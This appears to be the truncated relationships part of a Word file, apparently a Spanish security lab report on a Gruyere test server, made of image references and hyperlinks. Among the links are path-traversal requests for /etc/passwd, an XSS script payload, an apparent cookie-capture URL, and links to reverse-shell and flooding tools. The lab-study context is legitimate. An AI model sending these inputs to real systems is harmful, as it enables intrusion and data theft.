Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image215.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image226.png"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image273.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image190.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image236.png"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image281.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image201.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/..%5Cetc%5Cpasswd" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image247.png"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image258.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/xss/" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/xss/" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image217.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github-com.translate.goog/mozilla/bleach?_x_tr_sl=auto&amp;_x_tr_tl=es&amp;_x_tr_hl=es&amp;_x_tr_pto=wapp" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image182.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image192.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3.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image228.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image248.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image259.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image275.png"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload" TargetMode="External"/><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hyperlink" Target="http://192.168.1.99:8080/" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.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2.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4.png"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image218.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image238.png"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github-com.translate.goog/ui/django-html_sanitizer?_x_tr_sl=auto&amp;_x_tr_tl=es&amp;_x_tr_hl=es&amp;_x_tr_pto=wapp" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image282.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.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192.168.1.99:8080/508597601879981526966878461485870966098/snippets.gtl" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.png"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/es-es/windows-hardware/drivers/ifs/elevation-of-privilege" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image193.png"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image229.png"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image249.png"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/D4Vinci/PyFlooder.git" TargetMode="External"/><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hyperlink" Target="https://google-gruyere.appspot.com/part1" TargetMode="External"/><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image" Target="media/image125.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image283.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/beef-xss/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.png"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image203.png"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image219.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image239.png"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26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15.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/D4Vinci/PyFlooder.git" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/csrf" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image174.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image194.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image210.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image230.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/t3l3machus/Villain/blob/main/Usage_Guide.md" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image260.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinfoleak.com/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:arin-contact@google.com" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/library/hashlib.html" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image284.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4.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image220.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image240.png"/><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2.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/508597601879981526966878461485870966098/deletesnippet" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image261.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:dave.soper@appliedsystems.com" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.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5.png"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image276.png"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tenable.com/plugins/was/113016" TargetMode="External"/><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5.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fissue" TargetMode="Externa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3.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image231.png"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/t3l3machus/Villain" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image253.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.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image" Target="media/image164.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image268.png"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image285.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5.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:eva@gmail.com" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image221.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image241.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.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hyperlink" Target="https://owasp.org/www-community/attacks/xss/" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image262.png"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image277.png"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Path_Traversal" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:eknowles@appliedsystems.com" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.png"/><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11.png"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image232.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image250.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><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image" Target="media/image148.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image254.png"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image269.png"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image286.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:3000/ui/panel" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:sanderfene21789@gmail.com" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image187.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image206.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image222.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image242.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/508597601879981526966878461485870966098/newsnippet2" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image263.png"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image278.png"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Denial_of_Service" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinfoleak.com/reports2/laparisa.html" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jknecht@appliedsystems.com" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ejemplo.com/search?busqueda=%3cscript%3ealert(i);%3c/script" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image197.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image212.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image233.png"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image251.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image255.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image270.png"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image287.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hyperlink" Target="https://google-gruyere.appspot.com/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.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7.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image223.png"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image243.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image264.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://haveibeenpwned.com/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:network-abuse@google.com" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image279.png"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.north-networks.com/que-es-la-vulnerabilidad-file-%20upload/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.148?cooke=" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image178.png"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image198.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image213.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shelld3v/JSshell" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ShutdownRepo/shellerator" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image288.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image244.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image265.png"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image179.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image214.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image272.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image189.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image225.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image235.png"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Leeon123/golang-httpflood.git" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image200.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image246.png"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image257.png"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image171.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image208.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image216.png"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image266.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><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fontTable" Target="fontTable.xml"/><Relationship Id="rId162" 